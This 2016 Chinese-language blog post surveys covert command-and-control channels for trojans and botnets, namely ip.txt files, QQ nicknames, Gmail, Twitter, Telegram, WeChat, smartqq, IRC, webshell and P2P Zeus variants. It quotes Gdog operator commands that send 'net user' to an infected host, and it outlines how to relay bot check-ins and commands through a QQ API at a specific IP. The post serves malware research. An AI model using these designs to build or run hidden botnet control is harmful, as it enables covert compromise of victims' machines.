恶意软件/BOT/C2隐蔽上线方式研究

catalogue

1. 传统木马上线方式
2. 新型木马上线方式
3. QQ昵称上线
4. QQ空间资料上线
5. 第三方域名上线
6. UDP/TCP二阶段混合上线
7. Gmail CNC
8. NetBot两次TCP握手验证上线
9. IRC Bot
10. WEBSHELL Bot
11. twittor Bot
12. Blaze Telegram Backdoor Toolkit (bt2)
13. 微信服务号Bot
14. smartqq-bot  
15. P2P Bot 

 

1. 传统木马上线方式

0x1: 正向主动连接

最早的远控木马都是"主动连接"，即肉鸡客户端主动监听一个端口(提前配置好)，等待主控端来连接，但是后来因为互联网的进一步发展，公网控制内网就出现了一定的问题，所以这种方法逐步不再使用

0x2: 反向(被动上线)

这是当前比较主流的C2 Bot上线方法，"被动连接"型的木马和"主动连接"的形式刚好相反，是木马即被控端主动来连接主控端。主控端开启一个端口，被控端去连接你配置好的IP地址(常常是硬编码在Binary内部)
有两种比较流行的被动上线方式

1. FTP/HTTP上线方式: 马的上线地址对应一个ftp文件下载链接
2. DNS域名解析: 马的上线地址对应一个DNS域名
//核心都是一种代理思想，将实际的、动态变化的上线IP/PORT通过一层动态解析机制隐藏起来

1. FTP Server保存文件(ip.txt)上线

在FTP服务器上写入一个ip.txt，内容就是你的主控端监听的IP地址和端口。当你的IP地址改变之后，你只需要再次更新这个ip.txt的内容即可。在配置木马的时候，只需要按照FTP上线方式的格式配置上线地址

2. HTTP Server保存文件(ip.txt)上线

和FTP Server方式原理是类似的，只是使用的网络协议不一样

http://www.tekla.pw/ip.txt

3. 域名解析上线

C2马通过静态编译将DNS解析库链接进Binary中，在回连上线前动态获取DNS IP地址，DNS作为一种互联网基础设施，可以保持稳定上线，灵活修改的特点 

Relevant Link:

http://www.freebuf.com/articles/terminal/77412.html

 

2. 新型木马上线方式

躲避网络监控设备的检测的思路其实很容易理解

1. 使用基础服务、公共服务常用协议，例如HTTP协议通信
2. 2级、多级代理方式，将点对点通信方式解耦
3. 反沙箱、反监控检测技术

接下来逐个分析

 

3. QQ昵称上线

这是一种公共信道的隐藏方式

http://users.qzone.qq.com/fcg-bin/cgi_get_portrait.fcg?uins=869655938

大灰狼/猎狐远控就采用了这种上线方式(DNS/IP/QQ昵称混合)

通过API获取指定QQ号的昵称数据后，进行简单的算法解密、Base64解密，得到IP:Port信息，随后的流程和C/S架构的Bot类似

portraitCallBack({"202109629":["http://qlogo2.store.qq.com/qzone/202109629/202109629/100",0,-1,0,0,0,"npmwkqr",0]})

Relevant Link:

http://drops.wooyun.org/papers/14412 

 

4. QQ空间资料上线

和QQ昵称的上线方式一样，都是将加密后的上线信息写在一个可公共HTTP/API/JSON访问的地方，常常是社交媒体(提高隐蔽性)，对于马来说需要增加一个网络IO获取过程和解密过程，其他过程和传统的木马上线方式一样

Relevant Link:

http://blogs.360.cn/360safe/2014/08/29/cnc_trojan_and_fake_proto/

 

5. 第三方域名上线

这种木马使用的第三方域名实际上是利用第三方网站能够写入并及时修改自己的通信数据。木马编写者往往会寻找知名的网站，至少不会出现宕机的情况，以保持肉鸡的持久性控制。这样的网站很多，比如说博客类网站等等。可以提前发表一篇博文，并在博文里插入控制命令，之后特制的木马，就会去获取控制命令，同时木马也可以模拟编辑博文，写入执行结果的数据
这种方式的缺点是无法进行大批量的数据传输，像文件传输这样的功能虽然也可以实现，但是"用户体验"很差，所以这种上线方式的木马，大多被用来当作一个隐蔽的后门木马，只需要有一个文件下载和CMD Shell的功能

Relevant Link:

http://www.freebuf.com/articles/terminal/77412.html

 

6. UDP/TCP二阶段混合上线

这类似于anti-Sandbox的对抗思路，木马利用了malware network sandbox常常处于隔离的断网环境的条件，进行sandbox探测，如果检测到处于sandbox环境则隐藏真实C&C Login行为，从而躲避网络抓包的检测

Relevant Link:

http://www.freebuf.com/articles/system/74679.html

 

7. Gmail CNC

Gdog是一款基于Python，以Gmail作为命令和控制服务器的Winddows后门工具，具有隐蔽性的优势

0x1: 特点

1. 通信数据加密（AES）+SHA256哈希
2. 使用系统信息生成唯一的id(SHA256哈希)
3. Job IDs是随机的SHA256哈希
4. 获取系统信息
5. 获取地理信息(城市，国家，经度，纬度 等等)
6. 获取运行的进程、服务、用户、设备(硬件)
7. 获取客户端列表
8. 执行系统命令
9. 从客户端下载文件
10. 上传文件至客户端
11. 执行shellcode
12. 截屏
13. 锁定客户端屏幕
14. 键盘记录
15. 关闭或重启远程计算机
16. 注销当前用户
17. 从WEB下载文件
18. 访问网站
19. 给用户弹消息框

0x2: 设置

1. 一个Gmail账户 
2. 在账户的安全设置中打开"Allow less secure apps"
3. 在账户设置中启动IMAP

0x3: Bot Client

和大多数Bot Client一样，Client主要由以下几个大块组成

1. 收集当前主机信息，加密(可选)，发送给C2C端(通过gmail邮件实现代理效果)
2. c2c消息解析模块
3. 执行具体功能的函数模块(keylogger、screenshot、cmd..)

1. 上线

client将信息以加密方式发送到指定gmail帐号中，邮件标题即为client id号

2. 执行指令

Bot Client定时地从gmail邮箱中获取最新的"指令邮件"，执行后，将执行结果发送回gmail邮箱，可以看出，Bot Client是一个典型的解耦架构

{'res': ['0;System Idle Process', '4;System', '320;smss.exe', '444;csrss.exe', '548;wininit.exe', '620;services.exe', '628;lsass.exe', '724;svchost.exe', '788;svchost.exe', '300;svchost.exe', '304;svchost.exe', '8;svchost.exe', '1060;svchost.exe', '1068;svchost.exe', '1092;svchost.exe', '1200;WUDFHost.exe', '1296;igfxCUIService.exe', '1324;svchost.exe', '1428;ibmpmsvc.exe', '1528;QQPCRTP.exe', '1732;WUDFHost.exe', '1864;WUDFHost.exe', '1852;vpnagent.exe', '2172;spoolsv.exe', '2496;svchost.exe', '2520;mDNSResponder.exe', '2528;AppleMobileDeviceService.exe', '2564;ibtsiva.exe', '2672;pcas.exe', '2708;QQProtect.exe', '2724;secbizsrv.exe', '2732;TenpayServer.exe', '2888;SynTPEnhService.exe', '2904;svchost.exe', '2988;svchost.exe', '2996;TBSecSvc.exe', '3008;TsService.exe', '3016;valWBFPolicyService.exe', '3052;vmware-authd.exe', '3060;valWbioSyncSvc.exe', '1588;vmware-usbarbitrator64.exe', '1584;vmnetdhcp.exe', '2464;vmnat.exe', '3144;wwbizsrv.exe', '3356;dasHost.exe', '3464;WmiPrvSE.exe', '3736;vmware-hostd.exe', '5664;PresentationFontCache.exe', '6492;GoogleUpdate.exe', '16084;QQMusicService.exe', '8280;OfficeClickToRun.exe', '6732;SearchIndexer.exe', '5956;dllhost.exe', '13108;csrss.exe', '16968;winlogon.exe', '12128;dwm.exe', '18876;SynTPEnh.exe', '8052;SensorDBSynch.exe', '5288;sihost.exe', '8336;conhost.exe', '7200;taskhostw.exe', '11464;igfxEM.exe', '16660;SynTPHelper.exe', '11348;explorer.exe', '19204;aliwssv.exe', '5928;conhost.exe', '10036;RemindersServer.exe', '8200;SynTPLpr.exe', '12400;SynLenovoHelper.exe', '16916;ShellExperienceHost.exe', '2664;TSVNCache.exe', '16288;RuntimeBroker.exe', '10412;SearchUI.exe', '720;SettingSyncHost.exe', '11592;QQPCTray.exe', '18176;QQPCNetFlow.exe', '12444;QQPCRealTimeSpeedup.exe', '13812;AliLangAgent.exe', '17896;AliLangClient.exe', '19792;yunpan.exe', '16812;FileEncryptionSvr.exe', '9316;alineiwai.exe', '19816;vmware-tray.exe', '18336;svchost.exe', '13660;RAVCpl64.exe', '18096;RAVBg64.exe', '10572;TXPlatform.exe', '12936;DingTalk.exe', '1516;DingTalk.exe', '15956;DingTalk.exe', '12768;DingTalk.exe', '15508;AliIM.exe', '16100;AliApp.exe', '11996;TaobaoProtect.exe', '7284;QQBrowser.exe', '9896;firefox.exe', '6368;QQBrowser.exe', '13520;qqbrowser.exe', '11364;chrome.exe', '17372;chrome.exe', '5124;360se.exe', '5924;chrome.exe', '9664;pycharm.exe', '17432;qqbrowser.exe', '15416;ONENOTE.EXE', '19840;360se.exe', '13364;chrome.exe', '17064;sublime_text.exe', '11028;360se.exe', '13040;qqbrowser.exe', '12556;qqbrowser.exe', '19872;qqbrowser.exe', '15204;360se.exe', '11992;cmd.exe', '16600;cmd.exe', '9052;conhost.exe', '13096;conhost.exe', '15580;360se.exe', '19172;QMChExt.exe', '12876;QMChExt.exe', '16536;qqbrowser.exe', '15424;qqbrowser.exe', '16024;ONENOTEM.EXE', '6152;fsnotifier.exe', '13480;conhost.exe', '10452;SkypeHost.exe', '13048;QQDownload.exe', '1276;editplus.exe', '6440;SystemSettingsBroker.exe', '17368;NetworkUXBroker.exe', '16404;fontdrvhost.exe', '18968;AliIM.exe', '13704;AliApp.exe', '5624;360se.exe', '15552;Xshell.exe', '7336;XshellCore.exe', '12700;filezilla.exe', '16980;chrome.exe', '896;QQMusic.exe', '20040;QQMusicExternal.exe', '20356;QQMusicExternal.exe', '19228;QQMusicIE.exe', '32;QQMusicExternal.exe', '13904;audiodg.exe', '17796;FMAPP.exe', '8104;chrome.exe', '16344;wampmanager.exe', '5512;httpd.exe', '6392;mysqld.exe', '9096;httpd.exe', '10592;ApplicationFrameHost.exe', '10556;Calculator.exe', '1056;Microsoft.Photos.exe', '17112;chrome.exe', '5044;chrome.exe', '19028;chrome.exe', '3264;SystemSettings.exe', '6984;chrome.exe', '10344;chrome.exe', '6912;360se.exe', '12344;360se.exe', '19640;QQ.exe', '1156;QQExternal.exe', '18984;qqbrowser.exe', '2596;cmd.exe', '7328;conhost.exe', '16524;360se.exe', '5888;360se.exe', '4188;360se.exe', '2748;SearchProtocolHost.exe', '10756;WmiPrvSE.exe', '18776;SearchFilterHost.exe', '9596;python.exe', '7912;conhost.exe'], 'cmd': 'tasks'}

0x4: Bot CNC

1. 查看当前在线Client

CNC和Bot Client实现了完全的解耦，CNC通过查收gmail邮件的方式查看当前在线主机

python gdog.py -info -id b6b5164785a94ca60c6a360df4f800a45b3d3b26233443536c0acab902d0b779

2. 向Bot Client发送指令并取回执行结果

python gdog.py -cmd "net user" -id b6b5164785a94ca60c6a360df4f800a45b3d3b26233443536c0acab902d0b779

Bot Client执行的结果依然通过邮件发送回来了，所以CNC需要主动去"尝试获取"执行结果

python gdog.py -jobid 2b680930e5bd74ef9e5dca9ee8ff3fe2d20f57cfce693da341d9c10aae52065d -id b6b5164785a94ca60c6a360df4f800a45b3d3b26233443536c0acab902d0b779

类似的还有gcat

Relevant Link:

http://www.freebuf.com/sectool/105144.html
https://github.com/byt3bl33d3r/gca

 

8. NetBot两次TCP握手验证上线

1. Bot Client -> CNC: 00000011f4000000354c6d80b0ff7600
/*
1. anti-sandbox: 保证在C2C存活的前提下才发送真正的上线请求包
2. anti-scanner: 对于一般的单次交互scanner来说，这种设计的C2C会更加隐蔽一些
*/
2. CNC -> Bot Client: TCP ACK
3. Bot Client -> CNC: b4b2b1b8b2b6b2b8adb1b5b3b9c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2b5b1b48d84c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c29769709a92a29392b3c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2b1acb4b4b9b68d8a7cc2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2b1b9b4b0b1b8bab0b1b1b4b0b1b3b5c2b4b2b1b8b2b5b3b2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c262c2c2c2
4. 上线成功
5. CNC -> Bot Client(定时发送心跳包): 03000000000000000000000000000000

 

9. IRC Bot

利用IRC中继组网方式管理CNC和Bot Client的通信，在实际的案例中，有遇到过

1. PHP IRC Bot
2. Perl IRC Bot

Relevant Link:

http://www.cnblogs.com/LittleHann/p/5215766.html
http://www.cnblogs.com/LittleHann/p/5394926.html

 

10. WEBSHELL Bot

WEBSHELL Bot本质上不是新技术，它和gmail bot/irc bot的逻辑架构是一样的，都是由Client发起异步轮询指令，并将执行结果回传，等待CNC异步取回的模式

Relevant Link:

http://www.cnblogs.com/LittleHann/p/5507555.html

 

11. twittor Bot

A stealthy Python based backdoor that uses Twitter (Direct Messages) as a command and control server This project has been inspired by Gcat which does the same but using a Gmail account.

Relevant Link:

https://github.com/PaulSec/twittor

 

12. Blaze Telegram Backdoor Toolkit (bt2)

0x1: 简介

1. Telegram

1. 跨平台的实时通讯应用
2. 支持Android、iPhone/iPad、WP、Web、PC/Mac/Linux
3. 通信加密: Telegram Encryption
4. 支持发送所有文件类型
5. 开放api，可定制开发客户端

2. Bots: Tegegram内置的第三方应用，通信方式为HTTPS，功能(类似于聊天机器人)

1. Get customized notifications and news
2. Integrate with other services
3. Create custom tools
4. Build single- and multiplayer games
5. Build social services
6. Do virtually anything else

Relevant Link:

http://drops.wooyun.org/tips/16142 
https://blog.blazeinfosec.com/bt2-leveraging-telegram-as-a-command-control-platform/
https://github.com/nickoala/telepot
https://github.com/blazeinfosec/bt2

 

13. 微信服务号Bot

和Gmail Bot不同的是，微信公众号/Tegegram Bot可以实现简单的"聊天机器人"功能，相当于省去了轮询从获取Gmail邮件的步骤，减少了心跳/消息回传的编码开销，相当于一个简单的图灵机

0x1: 申请个人微信服务号

微信对申请人有一定的准入门槛，需要经过一个申请流程才能拿到服务号

Relevant Link:

https://www.zhihu.com/question/20492916
http://kf.qq.com/faq/120322fu63YV130422AJbaI3.html

 

14. smartqq-bot 

0x1: 安装启动

apt-get install npm 
apt-get install node 
npm install -g smartqq-bot
nodejs /usr/local/lib/node_modules/smartqq-bot/main.js
http://114.55.36.222:3100/ 
使用手机QQ扫描登录后

0x2: 访问API接口

http://114.55.36.222:3200/send?type=[group|buddy|discuss]&to=[qqnumber/nick/gname]&msg=[msg]
http://114.55.36.222:3200/send?type=group&to=198167523&msg="test for bot"
http://114.55.36.222:3200/send?type=buddy&to=753125749&msg=hello

0x3: CNC QQ

用于部署CNC的QQ就是我们基于smart qq通过扫码登录的qq，实现基于QQ的CNC可以采取以下思路

1. Bot Client启动后，和普通的malware一样，进行持久化保护(注册服务、内存注入、注册表启动项等)，收集本机信息，例如windwos%20xp%20sp3|2GMhz|8GM|2CPU|ver:bot1.0|127.0.0.1
2. Bot Client通过Smart QQ API，将上线信息发送给Proxy QQ
http://114.55.36.222:3200/send?type=group&to=妈妈说名字长会有人粉&msg=windwos%20xp%20sp3|2GMhz|8GM|2CPU|ver:bot1.0|127.0.0.1

3. Proxy QQ(Nodejs Server)要完成两件事
    1) 将消息转发到QQ Group CNC上，甚至可以通过启动另一个Smart QQ来操作QQ Group CNC
    2) 记录Bot Client的上线信息(操作系统、带宽、内存、CPU核数等)

4. 根据自定义协议，接收来自QQ Group CNC的"cmd指令"，例如list，将接收到的指令保存在内存队列中，等待Bot Client来获取
5. Bot Client会定时从Proxy QQ获取最新的"cmd指令"，本地执行后，将执行结果同样通过Smart QQ API传回给Proxy QQ，Proxy QQ可以记录到后端DB，以及转发到QQ Group CNC中
6. 以上便完成了一个完成的Bot Client和CNC的指令交互过程

Relevant Link: 

https://www.npmjs.com/package/smartqq-bot
https://github.com/ScienJus/qqbot
http://www.scienjus.com/webqq-analysis-1/
https://github.com/xqin/SmartQQ-for-Raspberry-Pi/blob/master/WebQQ.py
https://github.com/ScienJus/smartqq

 

15. P2P Bot

a modified variant of Zeusbot/Spyeye which uses peer-to-peer (P2P) architecture to communicate. The original Zeusbot communicated directly with its C&C server to download configuration data and upload stolen information. This was a major point of failure for the bot because the C&C server could be blocked or taken down, and the attacker would lose control of the botnet. The bot did have a fallback strategy: if the C&C server was down it generated pseudo-random domain names to contact. The attacker could of course predict those domain names and register one in order to gain back control of the bot, but the solution was not very efficient. (Terminology note: although we use the term “C&C” for the main server controlled by the attackers, this server is not a typical C&C in its functionalities, but is mainly a collector of information from the drones.)
传统C/S集中式CNC Bot的缺点在于中心化，即如果处于网络拓朴中心的CNC失效了，则不管肉鸡Bot是否存活，BOT操纵者已经没有机会"指示"剩余依旧存活的肉鸡重新指向另一个CNC，因为和他们唯一通信的旧CNC已经失效了
而P2P网络能解决这一问题，Bot不再直接和中心CNC进行TCP通信，而是使用peer-2-peer协议和所有其他肉鸡进行通信，并且新的肉鸡很容易借助p2p协议"入网"，Bot之间共享一份动态的ip list文件(在p2p基础上再加一层代理的思想)，这样，当一个C2服务器失效后，操纵者可以很容易的入网，然后重新"传播"一份新的上线ip list，让剩余的存活肉鸡重新上线，p2p解决了在C2 CNC失效后，如何通知BOT肉鸡的难题
To overcome these limitations the attackers have now decided to use P2P. This modified variant of Zeusbot/Spyeye contains a list of IP addresses to contact. These IPs are not servers; they are other infected clients (peers). These clients provide configuration data, which in turn contains the URL of the main C&C server. In this modified way, even if the C&C server is taken down, the P2P network remains alive and can be fuelled with a new configuration file pointing to a new URL for a new C&C server. Can the P2P network be shut down? No (at least, not easily). The IP addresses in the P2P network cannot be blocked because, in most cases, they would be normal broadband IPs (home users and work computers, for instance) and blocking them would disrupt legitimate network traffic. Also, the list of peers can update so frequently that tracking them proves difficult. Using a P2P network this way is more resistant than just a single C&C URL, and can considerably prolong a botnet’s lifetime.

0x1: 运行方式

1. When run, the bot injects itself into the “explorer.exe” process, and tries to contact all the IP addresses one-by-one using UDP. This communication protocol is not complex. It can exchange several data packets with specific codes and meanings and, to identify the communications, have the peers use SHA-1 codes to keep track of the data.
2. To initiate a communication the bot sends out a “portknocking” data packet that contains a  header with the SHA-1 of the infected machine and the SHA-1 of the contacted machine. 
3. Every infected machine (peer) has its own unique identifier SHA-1 and every bot contains a list of SHA-1 : IP couples which represent unique hosts on the P2P network. After the portknocking packet is accepted by a peer, the reply to the portknocking includes a new list of peers (SHA-1 : IP couples again). This keeps the P2P network updated with a list of new machines.
4. More UDP packets may follow the portknocking, exchanging different data 

When the UDP communication is complete, the bot will then proceed to contact the peer through TCP. At this stage the bot can receive both a configuration file or an update of the bot itself. The decrypted configuration data contains the address of the C&C server which the bot contacts through a simple HTTP POST request. The bot then sends data about the infected machine (name of the machine and other information) to the C&C server.

0x2: 完全P2P化

With the latest update, it seems that the C&C server has disappeared entirely for this functionality. Where they were previously sending and receiving control messages to and from the C&C, these control messages are now handled by the P2P network.
This means that every peer in the botnet can act as a C&C server, while none of them really are one. Bots are now capable of downloading commands, configuration files, and executables from other bots—every compromised computer is capable of providing data to the other bots.
While these changes make the botnet more resistant to takedown, and equally more difficult to track the attackers behind it, it also provides another major benefit to the attackers.
通过使用P2P进行网络架构改造，僵尸网络完全脱离了CNC节点的失效风险

0x3: More UDP, less TCP

Another noticeable update is that communication has shifted more and more to UDP. As we have previously discussed, the bots would contact each other by using a sort of homemade UDP handshake. If successful, this would cause the bots to exchange TCP data, such as configuration files, list of other peers, etc. However, TCP communications are easy to track and dump, and the bot does not perform any authentication on the packets exchanged, so anyone can impersonate a bot and successfully communicate with other bots, downloading stuff like configuration data.
In this new strain, the data exchange is also now happening in UDP. Given the stateless nature of this protocol, it is more difficult to capture and extract data from bot communications.

Relevant Link:

http://www.symantec.com/connect/blogs/cracking-new-p2p-variant-zeusbotspyeye

 

Copyright (c) 2016 LittleHann All rights reserved